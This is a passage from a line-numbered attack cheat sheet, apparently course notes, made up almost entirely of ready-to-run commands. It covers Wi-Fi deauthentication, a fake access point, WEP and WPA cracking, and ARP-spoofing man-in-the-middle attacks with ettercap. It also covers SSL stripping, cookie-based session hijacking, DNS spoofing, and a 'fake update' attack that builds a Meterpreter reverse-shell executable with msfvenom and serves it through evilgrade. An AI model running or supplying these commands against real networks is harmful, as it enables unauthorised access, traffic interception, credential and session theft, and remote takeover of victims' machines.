349> ifconfig wlan0 down
350
351> airmon-ng start wlan0
352
353> airmon-ng stop wlan0
354
355> airmon-ng start mon0
356
357> airodump-ng mon0
358
*Ctrl+C
360
361> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
362ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
363
364~Deauthenticate all clients in a specific network
365> aireplay-ng --deauth [number-of packets] -a [Access-Point] [interface]
366ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0
367
368~Deauthenticate a specific client in a network
369> aireplay-ng --deauth [number-of packets] -a [Access-Point] -c [target=STATION] [interface]
370ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
371
372######Deauthentication attacks#######
373
374
375> airodump-ng --write [filename] --output-format [file-format] [interface]
376ex: airodump-ng --write file --output-format csv mon0
377
378> airdrop-ng -t [csv-file] -r [rules-file] -i [interfaces]
379ex: airdrop-ng -t file-01.csv -r rules -i mon0
380
381--- Creating Rule-File for Air-drop (Summary) ---
382~ d/[bssid-target]|[Target Device]
383~a/[fake-mac/your-bssid]|[Target Device]
384
385For More Info: [URL]http://www.aircrack-ng.org/doku.php?id=airdrop-ng&DokuWiki=fc8c2e4leoquoc83lj0numire0[/URL]
386
387###### Creating Fake Access Point ######
388
~Edit the dhcp configuration file
390
391> echo -e "interface=at0\ndhcp-range=192.168.0.3,192.168.0.150,12h" > /etc/dnsmasq.conf
392
393~Start Fake AP
394
395> airbase-ng -e [fake network name] -c [channel] [interface]
396ex: airbase-ng -e fake-ap -c 6 mon0
397
398ifconfig at0 192.168.0.1 up
399
400~Removing IPTABLEs rules
401
402> iptables --flush
403> iptables --table nat --flush
404> iptables --delete-chain
405> iptables --tables nat --delete-chain
406
~Enable packet forwarding in iptables
408
409> iptables -P FORWARD ACCEPT
410
~Link the wifi card and the card that's connected to the internet
412
413> iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE
414ex: iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
415
416~Start dnsmasq
417
418> sudo dnsmasq
419
~Enable IP forwarding
421
422> echo "1" > /proc/sys/net/ipv4/ip_forward
423
424###### WEP Cracking Basic ######
425
426> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
427ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
428
429> aircrack-ng [file-name]
430ex: aircrack-ng file-01.cap
431
432###### Fake Authentication / Packet Injection ######
433
434> aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]
435ex: aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
436
--The FOLLOWING techniques can be executed, depending on the methodology you want :)
438
~ARP request replay Technique
440
441> aireplay-ng --arpreply -b [target MAC] -h [your MAC] [interface]
442ex: aireplay-ng --arpreplay -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
443
444~Chop Chop Technique
445
446> aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
447ex: aireplay-ng --chopchop -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
448
449> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
450ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
451
452> aireplay-ng -2 -r [out from last step] [interface]
453ex: aireplay-ng -2 -r file mon0
454
455~Fragmentation Technique
456
457 aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]
458ex: aireplay-ng --fragment -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0
459
460> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
461ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file
462
463> aireplay-ng -2 -r [out from last step] [interface]
464ex: aireplay-ng -2 -r file mon0
465
466###### WPA Cracking Basic ######
467
468> wash -i mon0
469
470~Reaver
471
472> reaver -b [target bssid] -c [channel] -i [interface]
473ex: reaver -b 11:22:33:44:55:66 -c 6 -i mon0
474
475###### Capturing Handshake #######
476
> airodump-ng --channel [channel] --bssid [bssid] --write [filename] [interface]
478ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0
479
480> aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
481ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0
482
483###### Creating Wordlist w/ crunch ######
484
485> crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o [filename]
486ex: crunch 6 8 123456!"&$% -t a@@@@b -o wordlist.txt
487
488###### Cracking the Key w/ Handshake file ######
489
490> aircrack-ng [handshake file] -w [wordlist] [interface]
491ex: aircrack-ng file-01.cap -w wordlist.lst mon0
492
493####### Creating a PMK wordlist ######
494
~Create a database & import the wordlist
496
497> airolib-ng [db_name] --import passwd [wordlist]
498ex: airolib-ng db_wordlist --import passwd wordlist.lst
499
~Import the target ESSID
501
502> airolib-ng [db_name] --import essid [wordlist]
503ex: airolib-ng db_wordlist --import essid wordlist.lst
504
~Compute the PMKs for the wordlist
506
507> airolib-ng [db_name] --batch
508ex: airolib-ng db_wordlist --batch
509
~Crack the key using the PMK DB
511
512> aircrack-ng -r [db_name] [handshake file]
513ex: aircrack-ng -r db_wordlist file-01.cap
514
###### Cracking .cap file w/ hashcat ######
516
517[URL]https://hashcat.net/cap2hccap/[/URL]
518
519[URL]https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/[/URL]
520
521++++++++++++++++++++++
Post-Connection Attacks
523++++++++++++++++++++++
524
525###### Info Gathering ######
526
527~Netdiscover
528
529> netdiscover -i [interface] -r [range]
530ex: netdiscover -i wlan0 -r 192.168.1.1/24
531
532~Autoscan
533
534[URL]http://downloads.sourceforge.net/project/autoscan/AutoScan/autoscan-network%201.50/AutoScan-Network-Linux-1.50.bin.tar.gz?r=&ts=1475845627&use_mirror=nchc[/URL]
535
536~Nmap/Zenmap
537
538-Ping Scan
539> nmap -sn [IP/IP Range]
540
541-Quick Scan
542> nmap -T4 -F [IP/IP Range]
543
544-Quick Scan Plus
545> nmap -sV -T4 -O -F --version-light [IP/IP Range]
546
547####### MITM ######
548
549~Arpspoof
550
551> arpspoof -i [interface] -t [target ip] [AP IP/ Default Gateway]
552ex: arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1
553
554> arpspoof -i [interface] -t [AP IP/ Default Gateway] [target ip]
555ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.12
556
557> echo "1" > /proc/sys/net/ipv4/ip_forward
558
559~Ettercap
560
561> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
562ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
563ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
564
565> echo "1" > /proc/sys/net/ipv4/ip_forward
566
--Configure the ettercap config file
568
569> gedit /etc/ettercap/etter.conf #Uncomment Linux::Iptables
570
571###### MITM Bypassing HTTPS/SSL #######
572
573~configure etter.conf
574
575> gedit /etc/ettercap/etter.conf
576
--Change this:
578[privs]
579ec_uid = 65534 # nobody is the default
580ec_gid = 65534 # nobody is the default
--into this (ettercap then keeps running as root instead of dropping to the 'nobody' user):
582[privs]
583ec_uid = 0 # nobody is the default
584ec_gid = 0 # nobody is the default
585
586~iptables
587
588> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
589
590~SSLSTRIP
591
592> sslstrip -p
593
594~Ettercap
595
596> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
597ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
598ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
599
600
601> echo "1" > /proc/sys/net/ipv4/ip_forward
602
603###### SESSION Hijacking ######
604
605> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
606ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
607ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network
608
609> echo "1" > /proc/sys/net/ipv4/ip_forward
610
611[URL]https://www.cookiecadger.com/files/CookieCadger-1.08.jar[/URL]
612
613> java -jar CookieCadger-1.08.jar
614
615###### DNS Spoofing ######
616
617~configure etter.dns
618
619> gedit /etc/ettercap/etter.dns
620--> *.sitename.com A *your_ip_here
621
622> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
623ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
624ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
625
626> echo "1" > /proc/sys/net/ipv4/ip_forward
627
628$$$$ ETTERCAP PLUGINS $$$$
629
630[URL]https://linux.die.net/man/8/ettercap_plugins[/URL]
631
632###### Ettercap Filters ######
633
634> echo "kill();drop();" > drop-packets.filter
635
636> etterfilter drop-packets.filter -o drop-packets.ef
637
638> ettercap -Tq -M arp:remote -F drop-packets.ef -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
639ex: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 /192.168.1.1/ /192.168.1.12/
640ex2: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 // #target all network
641
642> echo "1" > /proc/sys/net/ipv4/ip_forward
643
###### Ettercap GTK/GUI ######
645
646> ettercap -G
647
648###### XPlico #####
649
650> service apache2 start
651
652> service xplico start
653
654[URL]127.0.0.1:9876/[/URL]
username | password :: xplico
656
657> ettercap -Tq -M arp:remote -w [filename] -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
658ex: ettercap -Tq -M arp:remote -w file -i wlan0 /192.168.1.1/ /192.168.1.12/
659ex2: ettercap -Tq -M arp:remote -w file -i wlan0 // #target all network
660
661#### Fake Update ####
662
663~metasploit
664
665> msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1337 X > update.exe
666
667> msfconsole
668> use exploit/multi/handler
669> set PAYLOAD windows/meterpreter/reverse_tcp
670> set LHOST your_ip
671> set LPORT 1337
672> exploit
673
674~Evilgrade
675
676> evilgrade
677> configure [module]
678> set agent update.exe
679> start
680
681~ DNS Spoof
682
683~configure etter.dns
684
685> gedit /etc/ettercap/etter.dns
686--> *.sitename.com A *your_ip_here
687
688> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
689ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
690ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network
691
692> echo "1" > /proc/sys/net/ipv4/ip_forward
693
694==================================================================
695E N D
696